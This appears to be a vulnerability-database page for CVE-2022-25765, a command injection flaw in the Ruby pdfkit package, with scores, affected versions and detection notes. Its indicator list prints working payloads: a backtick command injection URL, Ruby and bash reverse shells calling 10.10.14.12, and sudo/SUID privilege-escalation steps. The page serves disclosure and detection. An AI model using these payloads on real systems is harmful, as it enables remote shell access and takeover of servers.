cbcvebase.
CVE-2022-25765
published 2022-09-09

CVE-2022-25765: The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
38.92%
98.4th percentile
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

Affected

6 ranges
VendorProductVersion rangeFixed in
fedoraprojectfedora
fedoraprojectfedora
fedoraprojectfedora
pdfkit_projectpdfkit>= 0 < 0.8.7.20.8.7.2
pdfkit_projectpdfkit>= 0.0.0 < unspecifiedunspecified
pdfkit_projectpdfkit>= 0.0.0

Detection & IOCsextracted from sources · hover to see the quote

commandhttp://%20`{command}`
commandhttp://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{listenIP}","{listenPort}"))'`
commandhttp://10.10.14.12:8000/?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/10.10.14.12/443
commandbash -c 'exec bash -i &>/dev/tcp/10.10.14.12/443
commandsudo /usr/bin/ruby /opt/update_dependencies.rb
commandchmod u+s /bin/bash
path/opt/update_dependencies.rb
filenamedependencies.yml
versionpdfkit 0.8.7.2
  • ·The vulnerability affects all pdfkit versions from 0.0.0 through 0.8.7.2; the exploit was specifically tested on pdfkit 0.8.6, so detection rules should cover the full version range.
  • ·The default POST parameter targeted by the exploit is `url`; applications may use different parameter names, requiring tunable detection rules.
  • ·The injection requires the URL to contain a space encoded as `%20` immediately before the backtick-wrapped command; URL-decoding must be applied before pattern matching in WAF/IDS rules.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.